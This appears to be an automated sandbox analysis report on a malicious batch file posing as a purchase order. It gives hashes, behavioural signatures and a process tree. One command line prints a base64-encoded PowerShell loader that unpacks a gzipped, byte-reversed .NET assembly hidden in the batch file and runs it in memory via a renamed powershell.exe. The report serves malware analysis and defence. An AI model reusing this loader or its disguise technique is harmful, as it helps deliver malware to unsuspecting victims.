Analysis
-
max time kernel
154s -
max time network
196s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 11:27
Static task
static1
Behavioral task
behavioral1
Sample
New Purchase Order MRT10123E-05794011.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
New Purchase Order MRT10123E-05794011.bat
Resource
win10v2004-20230915-en
General
-
Target
New Purchase Order MRT10123E-05794011.bat
-
Size
1014KB
-
MD5
6e3fb71214123b19f8fd692c615c1577
-
SHA1
c30d85fc8d702705bcf5e6e7d9dc499733eaa03e
-
SHA256
aab4fc1afb94b7a35cad44aa926be0b28eeb52efc4746a49632f9f4427d96416
-
SHA512
35ea575c14094d2702ee908a24d974302708563dd787ee5ab9dfa61198bd6427eb8dadcca27e7027ca568f079df046b7d1f75c63500eac69f994431ea43a0830
-
SSDEEP
24576:DsCatJd8cOo5xYunVTxt3T7B4FvxjenbLz2D8qw:F4VHH0ebXL
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2372 Qicoiyo.png -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2372 Qicoiyo.png 2372 Qicoiyo.png 2372 Qicoiyo.png 2372 Qicoiyo.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2372 Qicoiyo.png Token: SeDebugPrivilege 2372 Qicoiyo.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3332 wrote to memory of 400 3332 cmd.exe 87 PID 3332 wrote to memory of 400 3332 cmd.exe 87 PID 3332 wrote to memory of 852 3332 cmd.exe 88 PID 3332 wrote to memory of 852 3332 cmd.exe 88 PID 3332 wrote to memory of 972 3332 cmd.exe 90 PID 3332 wrote to memory of 972 3332 cmd.exe 90 PID 972 wrote to memory of 444 972 cmd.exe 94 PID 972 wrote to memory of 444 972 cmd.exe 94 PID 972 wrote to memory of 1484 972 cmd.exe 92 PID 972 wrote to memory of 1484 972 cmd.exe 92 PID 972 wrote to memory of 1720 972 cmd.exe 95 PID 972 wrote to memory of 1720 972 cmd.exe 95 PID 972 wrote to memory of 520 972 cmd.exe 96 PID 972 wrote to memory of 520 972 cmd.exe 96 PID 972 wrote to memory of 2372 972 cmd.exe 97 PID 972 wrote to memory of 2372 972 cmd.exe 97 PID 972 wrote to memory of 2372 972 cmd.exe 97
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:400
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png2⤵PID:852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png3⤵PID:1484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1720
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat" C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png.bat3⤵PID:520
-
-
C:\Users\Admin\AppData\Local\Temp\Qicoiyo.pngC:\Users\Admin\AppData\Local\Temp\Qicoiyo.png -win 1 -enc JABQAGIAdAB5AGYAbwBlAGwAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQATgBrAHMAbgByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAYgB0AHkAZgBvAGUAbAApADsAJABBAGQAYgBiAG0AcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQATgBrAHMAbgByACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEYAegBkAGIAZgBqAHIAbABjAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQQBkAGIAYgBtAHIALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEYAegBkAGIAZgBqAHIAbABjAGMALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEYAegBkAGIAZgBqAHIAbABjAGMALgBDAGwAbwBzAGUAKAApADsAJABBAGQAYgBiAG0AcgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE4AawBzAG4AcgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABOAGsAcwBuAHIAKQA7ACAAJABRAGkAdgByAHgAZQB3AG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQATgBrAHMAbgByACkAOwAgACQATQB4AHAAdgB5AGUAIAA9ACAAJABRAGkAdgByAHgAZQB3AG8ALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABZAGgAbQBlAHQAbwBnACAAPQAgACQATQB4AHAAdgB5AGUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
1014KB
MD56e3fb71214123b19f8fd692c615c1577
SHA1c30d85fc8d702705bcf5e6e7d9dc499733eaa03e
SHA256aab4fc1afb94b7a35cad44aa926be0b28eeb52efc4746a49632f9f4427d96416
SHA51235ea575c14094d2702ee908a24d974302708563dd787ee5ab9dfa61198bd6427eb8dadcca27e7027ca568f079df046b7d1f75c63500eac69f994431ea43a0830
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82